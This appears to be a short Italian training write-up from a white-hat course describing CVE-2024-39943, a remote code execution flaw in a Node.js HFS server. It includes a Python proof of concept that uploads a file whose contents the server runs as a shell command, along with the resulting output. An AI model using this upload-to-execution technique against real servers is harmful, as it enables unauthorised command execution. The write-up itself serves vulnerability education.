
White Hat School 3ª edizione – 노정민 (@JenmrR)
In un ambiente server HFS basato su Node.js esiste una vulnerabilità che esegue il contenuto dei file caricati tramite child_process.execSync().
Un attaccante può eseguire direttamente comandi del sistema operativo tramite la funzionalità di caricamento dei file e può verificare i risultati dei comandi interni del server o controllare il sistema.
Questa è la vulnerabilità corrispondente a CVE-2024-39943 e rappresenta una minaccia dello stesso livello dell'iniezione di comandi (Remote Code Execution).
/upload ed esegue il contenuto dei file caricati direttamente come comando$ sudo docker-compose up --build -d
$ python3 poc.py
import requests
payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }
r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)
Risposta del server dopo l'esecuzione del PoC:
Executed:
Hello_From_Hacked_Server

execSync() comporta un grave rischio per la sicurezza.